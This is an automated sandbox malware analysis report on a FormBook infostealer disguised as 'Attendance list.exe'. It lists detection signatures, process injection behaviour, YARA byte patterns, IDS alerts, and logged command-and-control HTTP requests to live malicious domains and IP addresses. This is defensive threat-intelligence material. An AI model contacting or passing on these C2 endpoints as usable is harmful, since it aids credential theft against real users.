Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Attendance list.exe

Overview

General Information

Sample name:Attendance list.exe
Analysis ID:1465846
MD5:8a08778411f99d8db7790cb7f0a84e3b
SHA1:374833b2a846feb5c015f0ffcf44320a62ffa697
SHA256:fd8e19c88440f8e813686b5b91c2df082c0d319af7ff6a10056e27c5400228fe
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Attendance list.exe (PID: 5496 cmdline: "C:\Users\user\Desktop\Attendance list.exe" MD5: 8A08778411F99D8DB7790CB7F0A84E3B)
    • svchost.exe (PID: 7136 cmdline: "C:\Users\user\Desktop\Attendance list.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • sSzWYtHqcRqHklFYcPzKpLlSXP.exe (PID: 6600 cmdline: "C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • clip.exe (PID: 1488 cmdline: "C:\Windows\SysWOW64\clip.exe" MD5: E40CB198EBCD20CD16739F670D4D7B74)
          • firefox.exe (PID: 2944 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.4463038232.00000000042F0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000004.00000002.4463038232.00000000042F0000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2a990:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13eff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000004.00000002.4461289694.0000000002640000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000004.00000002.4461289694.0000000002640000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2a990:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13eff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000002.00000002.2180673228.00000000034C0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 9 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2cd53:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x162c2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            2.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2db53:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x170c2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Attendance list.exe", CommandLine: "C:\Users\user\Desktop\Attendance list.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Attendance list.exe", ParentImage: C:\Users\user\Desktop\Attendance list.exe, ParentProcessId: 5496, ParentProcessName: Attendance list.exe, ProcessCommandLine: "C:\Users\user\Desktop\Attendance list.exe", ProcessId: 7136, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\Attendance list.exe", CommandLine: "C:\Users\user\Desktop\Attendance list.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Attendance list.exe", ParentImage: C:\Users\user\Desktop\Attendance list.exe, ParentProcessId: 5496, ParentProcessName: Attendance list.exe, ProcessCommandLine: "C:\Users\user\Desktop\Attendance list.exe", ProcessId: 7136, ProcessName: svchost.exe

            Snort Signatures

            Timestamp:07/02/24-07:16:54.138571
            SID:2855464
            Source Port:49730
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/02/24-07:17:39.655226
            SID:2855464
            Source Port:49737
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/02/24-07:18:22.648730
            SID:2855464
            Source Port:49750
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/02/24-07:17:53.138400
            SID:2855464
            Source Port:49741
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/02/24-07:15:37.719521
            SID:2855464
            Source Port:49712
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/02/24-07:16:40.545082
            SID:2855464
            Source Port:49726
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/02/24-07:17:05.560896
            SID:2855464
            Source Port:49733
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/02/24-07:15:40.247293
            SID:2855464
            Source Port:49713
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/02/24-07:16:15.340972
            SID:2855464
            Source Port:49722
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/02/24-07:17:42.185389
            SID:2855464
            Source Port:49738
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/02/24-07:16:51.569315
            SID:2855464
            Source Port:49729
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/02/24-07:18:06.490979
            SID:2855464
            Source Port:49745
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/02/24-07:18:36.061329
            SID:2855464
            Source Port:49754
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/02/24-07:15:53.606736
            SID:2855464
            Source Port:49718
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/02/24-07:16:12.803259
            SID:2855464
            Source Port:49721
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/02/24-07:16:38.017253
            SID:2855464
            Source Port:49725
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/02/24-07:17:55.674478
            SID:2855464
            Source Port:49742
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/02/24-07:18:09.029321
            SID:2855464
            Source Port:49746
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/02/24-07:18:33.529295
            SID:2855464
            Source Port:49753
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/02/24-07:18:19.901548
            SID:2855464
            Source Port:49749
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/02/24-07:17:08.093244
            SID:2855464
            Source Port:49734
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/02/24-07:15:51.064470
            SID:2855464
            Source Port:49717
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: http://www.sandranoll.com/aroo/?Jjv=GpKhRVSHzLA8j4R&66s0QHx=bKy7FSIHmKYFjPoPKsunUN9vBLYaDX52twFEynhtde+XdOqoRjh1sl1n+ba+sSXyFBuEELqLWRHnTW9JDkHGB3kb0OJ7ghG7VUOTSl8sxinDCxUKcrHKEU0DEmNR7hjgMQ==Avira URL Cloud: Label: malware
            Source: http://www.sandranoll.com/aroo/Avira URL Cloud: Label: malware
            Source: http://www.xn--matfrmn-jxa4m.se/4hda/Avira URL Cloud: Label: malware
            Source: http://www.xn--matfrmn-jxa4m.se/4hda/?66s0QHx=+FYRabRorC7iiipcHmFJARkvcpdCy5kXHVGGEQvE/CSzp7OmTlR57ws6ggMdmmjgEK74RwiZfuW5KkdpyqG94cDJ5htquBO11HcjCOymydCfo0q1+e/CBcncmTCUQD5IVA==&Jjv=GpKhRVSHzLA8j4RAvira URL Cloud: Label: malware
            Multi AV Scanner detection for domain / URL
            Source: www.sandranoll.comVirustotal: Detection: 8%Perma Link
            Source: www.anuts.topVirustotal: Detection: 8%Perma Link
            Multi AV Scanner detection for submitted file
            Source: Attendance list.exeReversingLabs: Detection: 50%
            Source: Attendance list.exeVirustotal: Detection: 39%Perma Link
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.4463038232.00000000042F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4461289694.0000000002640000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2180673228.00000000034C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4462982503.00000000042B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2180342193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4463119733.0000000004980000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2181155888.0000000005A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: Attendance list.exeJoe Sandbox ML: detected
            Source: Attendance list.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000000.2093430557.000000000012E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: Attendance list.exe, 00000000.00000003.1995113050.0000000003620000.00000004.00001000.00020000.00000000.sdmp, Attendance list.exe, 00000000.00000003.1993378375.00000000037C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2081581870.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2180709353.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080172429.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2180709353.000000000379E000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000004.00000003.2183326669.0000000004463000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000004.00000003.2180679254.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4463310775.00000000047AE000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4463310775.0000000004610000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Attendance list.exe, 00000000.00000003.1995113050.0000000003620000.00000004.00001000.00020000.00000000.sdmp, Attendance list.exe, 00000000.00000003.1993378375.00000000037C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2081581870.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2180709353.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080172429.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2180709353.000000000379E000.00000040.00001000.00020000.00000000.sdmp, clip.exe, clip.exe, 00000004.00000003.2183326669.0000000004463000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000004.00000003.2180679254.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4463310775.00000000047AE000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4463310775.0000000004610000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: clip.pdb source: svchost.exe, 00000002.00000003.2139386634.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2180501051.0000000003000000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.0000000005BDC000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4461785541.0000000002766000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.0000000004C3C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000006.00000002.2467474395.000000001DB2C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.0000000005BDC000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4461785541.0000000002766000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.0000000004C3C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000006.00000002.2467474395.000000001DB2C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: clip.pdbGCTL source: svchost.exe, 00000002.00000003.2139386634.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2180501051.0000000003000000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_00924696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00924696
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_0092C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0092C9C7
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_0092C93C FindFirstFileW,FindClose,0_2_0092C93C
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_0092F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0092F200
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_0092F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0092F35D
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_0092F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0092F65E
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_00923A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00923A2B
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_00923D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00923D4E
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_0092BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0092BF27
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0265BC20 FindFirstFileW,FindNextFileW,FindClose,4_2_0265BC20
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4x nop then xor eax, eax4_2_02649870
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4x nop then mov ebx, 00000004h4_2_043D053E

            Networking

            barindex
            Snort IDS alert for network traffic
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49712 -> 217.160.0.106:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49713 -> 217.160.0.106:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49717 -> 142.250.181.243:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49718 -> 142.250.181.243:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49721 -> 208.91.197.27:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49722 -> 208.91.197.27:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49725 -> 43.252.167.188:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49726 -> 43.252.167.188:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49729 -> 194.9.94.85:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49730 -> 194.9.94.85:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49733 -> 23.251.54.212:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49734 -> 23.251.54.212:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49737 -> 199.192.19.19:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49738 -> 199.192.19.19:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49741 -> 213.145.228.16:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49742 -> 213.145.228.16:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49745 -> 91.195.240.19:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49746 -> 91.195.240.19:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49749 -> 194.58.112.174:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49750 -> 194.58.112.174:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49753 -> 172.67.210.102:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49754 -> 172.67.210.102:80
            Source: Joe Sandbox ViewIP Address: 23.251.54.212 23.251.54.212
            Source: Joe Sandbox ViewIP Address: 213.145.228.16 213.145.228.16
            Source: Joe Sandbox ViewIP Address: 194.9.94.85 194.9.94.85
            Source: Joe Sandbox ViewASN Name: VPSQUANUS VPSQUANUS
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewASN Name: DOMAINTECHNIKAT DOMAINTECHNIKAT
            Source: Joe Sandbox ViewASN Name: LOOPIASE LOOPIASE
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_009325E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_009325E2
            Source: global trafficHTTP traffic detected: GET /w6qg/?Jjv=GpKhRVSHzLA8j4R&66s0QHx=0lpTRQcDUH+iEsGzFrKDlEkxf0hSGbqe7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1Ca0ipuJKNLUJAUyvRep5v3DJLNu0m2HizCt4wFiNb5RCLtMg== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.hprlz.czConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /qe66/?66s0QHx=dnvLceXALBk3Hr4/PEp98EYmblYqw8i+NG0MGchlNc+FfqCdFLzpUNQMmrv30qtrBi93uCjMcFA24SebHgOv5wKSlbq5H9RfpzlUfmq/1+2mTftJij2S2gWTPvHx6aM7mw==&Jjv=GpKhRVSHzLA8j4R HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.catherineviskadi.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /wf3a/?Jjv=GpKhRVSHzLA8j4R&66s0QHx=EKVDXBgImxJWeZhJNsklc3Q8dq4iVG0MTaJQI9BJxmHKvH3SiDTatPSqYvMyoDFRoX1f1ApOAYKP2hecch8PPIbZZar3vE0ZmDGvAwUCcsFCeR/Dh+n2QaVtkWzZCs4EoA== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.hatercoin.onlineConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /xzzi/?Jjv=GpKhRVSHzLA8j4R&66s0QHx=9CTSfwlM5YWl8fva1LSaXKM8r2QUgbHW1FpC9VokAvwkUHOJycf2DDxLp9tWLELwEKEPfCC2oiLqmqE9jQi/U7l2GiVWxU2JTINSgPIAJ4NvupNBog1mPljiQYHOMEGLOA== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.bfiworkerscomp.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /rm91/?Jjv=GpKhRVSHzLA8j4R&66s0QHx=jSd7r+67+N1qAQkxX/tAwzcZagSYI1kZQchR8WhIexhCyQiFJMwmzlR6zVHzfOVMvsfcwBywDpFhuhrgfB+WA/0x0l7m7B814c3LweorfxiP0L71SZjJ1PPNKkJ0Qx2crw== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.xn--fhq1c541j0zr.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /4hda/?66s0QHx=+FYRabRorC7iiipcHmFJARkvcpdCy5kXHVGGEQvE/CSzp7OmTlR57ws6ggMdmmjgEK74RwiZfuW5KkdpyqG94cDJ5htquBO11HcjCOymydCfo0q1+e/CBcncmTCUQD5IVA==&Jjv=GpKhRVSHzLA8j4R HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.xn--matfrmn-jxa4m.seConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
